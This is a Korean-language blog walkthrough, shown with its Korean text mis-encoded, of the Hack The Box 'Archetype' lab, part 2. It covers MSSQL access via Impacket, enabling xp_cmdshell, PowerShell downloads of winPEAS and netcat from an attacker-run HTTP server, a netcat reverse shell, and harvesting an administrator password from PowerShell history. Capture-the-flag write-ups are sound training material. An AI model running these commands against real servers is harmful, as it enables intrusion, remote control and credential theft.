๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐ŸดCTF/Hack The Box

Hack The Box - Archetype ํ’€์ด(2)

by Janger 2024. 3. 4.
728x90
๋ฐ˜์‘ํ˜•

 

์ง์ ‘ ๊ฐ€์ƒ๋จธ์‹ ์—์„œ openvpn์„ ํ†ตํ•ด ํƒ€์ผ“ ๋จธ์‹ ๊ณผ ํ†ต์‹ ์ด ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋งŒ๋“ค์–ด ์ฃผ์—ˆ์Šต๋‹ˆ๋‹ค. 

์ด์ „์— ๋ง‰ํ˜”๋˜ ์ธํ„ฐ๋„ท ํ†ต์‹ ์ด ์ด์   ๊ฐ€๋Šฅํ•ด์กŒ์Šต๋‹ˆ๋‹ค. 

 

Task 4. What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
(Microsoft SQL Server์— ์ธ์ฆ๋œ ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๊ธฐ ์œ„ํ•ด Impacket ์ปฌ๋ ‰์…˜์˜ ์–ด๋–ค ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋‚˜์š”?)

 

 

๋ฌธ์ œ๊ฐ€ ์ดํ•ดํ•˜๊ธฐ ์–ด๋ ค์šธ ๊ฒฝ์šฐ ๋งจ ์ƒ๋‹จ์— ํžŒํŠธ๊ฐ€ ์ ํžŒ pdf ํŒŒ์ผ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” ๋ฒ„ํŠผ์ด ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๊ฑธ ๋ˆŒ๋Ÿฌ ์ฐธ๊ณ ํ•˜์„ธ์š”. 

 

๋ณด์•„ํ•˜๋‹ˆ mssqlclient.py๋ฅผ ํ†ตํ•ด MSSQL ์„œ๋ฒ„์— ์ ‘์†์ด ๊ฐ€๋Šฅํ•œ๊ฐ€ ๋ด…๋‹ˆ๋‹ค. 

 

๋‹ค์Œ ๋ช…๋ น์–ด๋“ค๋กœ ํŒŒ์ผ์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. 

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt

 

 

์„ค์น˜๊ฐ€ ๋๋‚˜๊ณ  -h ์˜ต์…˜์œผ๋กœ ๋ช…๋ น์–ด๋“ค์„ ํ™•์ธ ํ•ด์ค๋‹ˆ๋‹ค. 

cd impacket/examples/
python3 mssqlclient.py -h

 

 

 

๋ฌธ์ œ 4 ์ •๋‹ต์€ mssqlclient.py

 

์ด์ œ mssqlclient.py๋ฅผ ์ด์šฉํ•ด ์„œ๋ฒ„์— ์ง์ ‘ ์ ‘์†์„ ํ•ฉ๋‹ˆ๋‹ค. 

python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth

 

-windows-auth : ์ด ํ”Œ๋ž˜๊ทธ๋Š” Windows ์ธ์ฆ์„ ์‚ฌ์šฉํ•˜๋„๋ก ์ง€์ •๋ฉ๋‹ˆ๋‹ค.

 

์—ฐ๊ฒฐ ๋„์ค‘์— ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๋ฌผ์–ด๋ณด๋ฉด ์ด์ „์— backups ๊ณต์œ  ํด๋”์—์„œ ์ฐพ์€ ๋น„๋ฐ€๋ฒˆํ˜ธ(M3g4c0rp123)๋ฅผ ์ž…๋ ฅํ•ด ์ธ์ฆ์„ ์™„๋ฃŒํ•ฉ๋‹ˆ๋‹ค. 

 

 

 

 

 

 

Task 5. What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
(Windows ๋ช…๋ น ์…ธ์„ ์ƒ์„ฑํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” Microsoft SQL Server์˜ ํ™•์žฅ ์ €์žฅ ํ”„๋กœ์‹œ์ €๋Š” ๋ฌด์—‡์ธ๊ฐ€์š”? )

 

 

 

 

 

๋ฌธ์ œ 5 ์ •๋‹ต์€ xp_cmdshell

 

(ํ”„๋กœ์‹œ์ € ๋ช…๋ น์–ด ์‚ฌ์šฉ ์˜ˆ์‹œ)

SQL> EXEC xp_cmdshell 'net user';

 

ํ•˜์ง€๋งŒ ์‹ค์ œ๋กœ ์‚ฌ์šฉํ•˜๋ฉด ์„œ๋ฒ„์ธก์—์„œ ํ•ด๋‹น ํ”„๋กœ์‹œ์ €๊ฐ€ ๋ธ”๋ฝ์ด ๋๋‹ค๊ณ  ๋‚˜์™€์„œ ํฌ๊ธฐํ•ด์•ผ ํ•˜๋‚˜ ์‹ถ์ง€๋งŒ.. ์•„์ด๋Ÿฌ๋‹ˆํ•˜๊ฒŒ ์ด ๋ธ”๋ฝ์„ ํ™œ์„ฑํ™”ํ•˜๋Š” ๋ฐฉ๋ฒ•์ด ํ•˜๋‚˜ ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. 

 

 

(xp_cmdshell ํ”„๋กœ์‹œ์ € ํ™œ์„ฑํ™” ๋ช…๋ น์–ด)

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

 

 

๋‹ค์‹œ ์‹คํ–‰ ๋ช…๋ น์–ด๋ฅผ ์ž…๋ ฅํ•˜๋‹ˆ ์ œ๋Œ€๋กœ ์ถœ๋ ฅ ๋˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•˜์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. 

 

 

 

 

Task 6. What script can be used in order to search possible paths to escalate privileges on Windows hosts?
(Windows ํ˜ธ์ŠคํŠธ์—์„œ ๊ถŒํ•œ์„ ์—์Šค์ปฌ๋ ˆ์ด์…˜ํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€๋Šฅํ•œ ๊ฒฝ๋กœ๋ฅผ ๊ฒ€์ƒ‰ํ•˜๊ธฐ ์œ„ํ•ด ์–ด๋–ค ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋‚˜์š”?)

 

๋งˆ์นจ ํžŒํŠธ "Peas for windows"๊ฐ€ ์žˆ๊ธธ๋ž˜ ๊ตฌ๊ธ€์— ๊ฒ€์ƒ‰์„ ํ•ด๋ณด๋‹ˆ "WinPEAS"๋ผ๋Š” ํˆด์ด ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค. 

 

winPEAS ์„ค์น˜ ์ฃผ์†Œ : https://github.com/carlospolop/PEASS-ng/releases/tag/20240226-e0f9d47b

 

 

xp_cmdshell๋กœ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋‹ค์ด๋ ‰ํŠธ๋กœ ๋ฐ›์„ ์ˆ˜ ์žˆ์„ ์ค„ ์•Œ์•˜์ง€๋งŒ ๋ฐฉํ™”๋ฒฝ ํƒ“์ธ์ง€ dns๋ฅผ ์ฐพ์„ ์ˆ˜ ์—†๋‹ค๊ณ  ๋‚˜์™€์„œ ์ง์ ‘ ํŒŒ์ด์ฌ์œผ๋กœ ํŒŒ์ผ ๊ณต์œ  ์„œ๋ฒ„๋ฅผ ๋งŒ๋“ค์—ˆ์Šต๋‹ˆ๋‹ค. 

 

python3 -m http.server 5000

 

(ํŒŒ์ผ ์„œ๋ฒ„๊ฐ€ ์‹คํ–‰๋˜๋Š” ์ค‘)

 

 

์ด์ œ ์•„๋ž˜์˜ ๋ช…๋ น์–ด๋ฅผ ๋„ฃ์–ด ๊ณต๊ฒฉ์ž์˜ ํŒŒ์ผ ์„œ๋ฒ„๋กœ ๋ถ€ํ„ฐ wiinPEAS๊ฐ€ ์„ค์น˜๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. 

EXEC xp_cmdshell 'powershell -c cd C:\Users\sql_svc\Downloads; wget http://๊ณต๊ฒฉ์žIP:5000/winPEASx86.exe -outfile winPEASx86.exe';

 

 

 

ํŒŒ์ผ ์„œ๋ฒ„์—๋Š” ์ ‘์† ๋กœ๊ทธ๊ฐ€ ์ฐํžˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. 

 

 

๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ncat์„ ์„ค์น˜ํ•˜๊ณ  ๊ณต๊ฒฉ์ž์™€ ํ”ผํ•ด์ž ๊ฐ„์˜ ๋ฆฌ๋ฒ„์Šค ์‰˜์„ ํ˜•์„ฑ ํ•ด์ค๋‹ˆ๋‹ค. 

 

(nc ์„ค์น˜ ๋ช…๋ น์–ด)

EXEC xp_cmdshell 'powershell -c cd C:\Users\sql_svc\Downloads; wget http://๊ณต๊ฒฉ์žIP:5000/nc64.exe -outfile nc.exe';

 

(๋ฆฌ๋ฒ„์Šค ์‰˜ LISTENING)

ncat -lvp 443

 

(๋ฆฌ๋ฒ„์Šค ์‰˜ ์ ‘์†)

EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe ๊ณต๊ฒฉ์žIP 443";

 

 

๋‹ค ๋งˆ์น˜์—ˆ๋‹ค๋ฉด ์•„๋ž˜์™€ ๊ฐ™์ด ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์˜ ์‰˜์„ ์ œ์–ด ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. 

 

 

winPEAS๋ฅผ ์‹คํ–‰ ์‹œํ‚ต๋‹ˆ๋‹ค.  

 

winPEAS๋ž€ ๊ณต๊ฒฉ ๋Œ€์ƒ์˜ ์šด์˜์ฒด์ œ ์ •๋ณด๋“ค์„ ๊ธฐ๋ฐ˜์œผ๋กœ ๋ณด์œ ํ•˜๊ณ  ์žˆ๋Š” ์ทจ์•ฝ์ ๋“ค์„ ์ž๊ธฐ๊ฐ€ ์ฐพ์•„๋‚ด์„œ ๊ถŒํ•œ ์ƒ์Šนํ•˜๋Š”๋ฐ ๋„์›€์„ ์ฃผ๋Š” ์†Œํ”„ํŠธ์›จ์–ด ์ž…๋‹ˆ๋‹ค. 

 

 

๋นจ๊ฐ„์ƒ‰ ๊ธ€์ž๊ฐ€ ๋ณด์ด๋ฉด ๊ทธ๊ฒƒ์€ ๊ณต๊ฒฉ์ž์—๊ฒŒ ๋„์›€์„ ์ค„๋งŒํ•œ ์ •๋ณด๋ฅผ ๋งํ•จ 

 

 

๋ฌธ์ œ 6 ์ •๋‹ต์€ winpeas

 

 

Task 7. What file contains the administrator's password?
์–ด๋–ค ํŒŒ์ผ์— ๊ด€๋ฆฌ์ž ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ๋‚˜์š”?

 

 

์ถœ๋ ฅ๋œ ๊ฒฐ๊ณผ์—์„œ PowerShell์˜ ํžˆ์Šคํ† ๋ฆฌ ๊ธฐ๋ก์ด ์กด์žฌํ•œ๋‹ค๊ณ  ๋‚˜์™”๋Š”๋ฐ ํ•ด๋‹น ๊ฒฝ๋กœ ํŒŒ์ผ์„ type ๋ช…๋ น์–ด๋กœ ๋‚ด์šฉ์„ ํ™•์ธํ•˜๋ฉด 

 

๋ช…๋ น์–ด๋กœ ๊ด€๋ฆฌ์ž ๊ณ„์ •์œผ๋กœ net ๋ช…๋ น์–ด๋ฅผ ํ†ตํ•ด backups ํด๋”์— ์ ‘๊ทผํ•œ ๊ธฐ๋ก์ด ์ฐํ˜€ ์žˆ๋‹จ ๊ฑธ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. 

 

 

 

๋ฌธ์ œ 7 ์ •๋‹ต์€ ConsoleHost_history.txt

 

 

์ฐพ๊ฒŒ๋œ ์ •๋ณด๋กœ ๊ด€๋ฆฌ์ž ๊ณ„์ • ๋กœ๊ทธ์ธ์„ ์‹œ๋„ํ•ฉ๋‹ˆ๋‹ค. ์ ‘์† ๋„๊ตฌ๋Š” psexec๋ฅผ ์‚ฌ์šฉํ•˜์˜€์Šต๋‹ˆ๋‹ค. 

 

 

 

sql_svc์˜ ๋ฐ”ํƒ•ํ™”๋ฉด์— ํ”Œ๋ž˜๊ทธ ํŒŒ์ผ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. 

 

 

๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ๊ด€๋ฆฌ์ž์˜ ๋ฐ”ํƒ•ํ™”๋ฉด ํด๋”์— ํ”Œ๋ž˜๊ทธ ํŒŒ์ผ์ด ์žˆ์Šต๋‹ˆ๋‹ค. 

728x90
๋ฐ˜์‘ํ˜•

'๐ŸดCTF > Hack The Box' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Hack The Box - Archetype ํ’€์ด(1)  (0) 2024.02.28